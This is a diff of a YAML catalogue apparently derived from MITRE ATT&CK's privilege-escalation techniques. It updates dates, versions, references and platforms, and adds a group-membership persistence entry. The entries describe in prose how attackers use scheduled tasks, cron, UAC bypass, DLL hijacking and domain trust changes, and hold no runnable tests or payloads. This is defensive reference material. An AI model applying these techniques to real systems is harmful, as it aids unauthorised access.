+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15324,7 +15589,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15356,8 +15621,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15371,6 +15636,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15383,11 +15652,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15453,7 +15725,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15542,7 +15813,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15630,7 +15900,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15715,7 +15984,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15747,7 +16015,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15770,11 +16038,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15832,14 +16099,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15940,7 +16206,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -15971,7 +16236,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16005,13 +16270,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16030,7 +16293,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -16044,7 +16306,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -16071,8 +16332,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16103,12 +16364,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16180,9 +16442,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16198,12 +16460,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16278,12 +16539,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16303,9 +16563,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16325,9 +16590,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16344,6 +16608,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16377,7 +16645,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16533,31 +16800,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16574,6 +16821,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16584,9 +16832,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16594,13 +16846,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16630,6 +16898,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16640,6 +16909,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16648,13 +16918,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16696,9 +16966,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -16766,19 +17033,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -16794,8 +17060,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16809,7 +17075,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -16835,6 +17101,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -16862,12 +17132,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16893,7 +17162,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16935,7 +17204,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -17013,11 +17281,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17097,7 +17364,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -17120,7 +17457,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17168,8 +17505,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17201,7 +17536,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
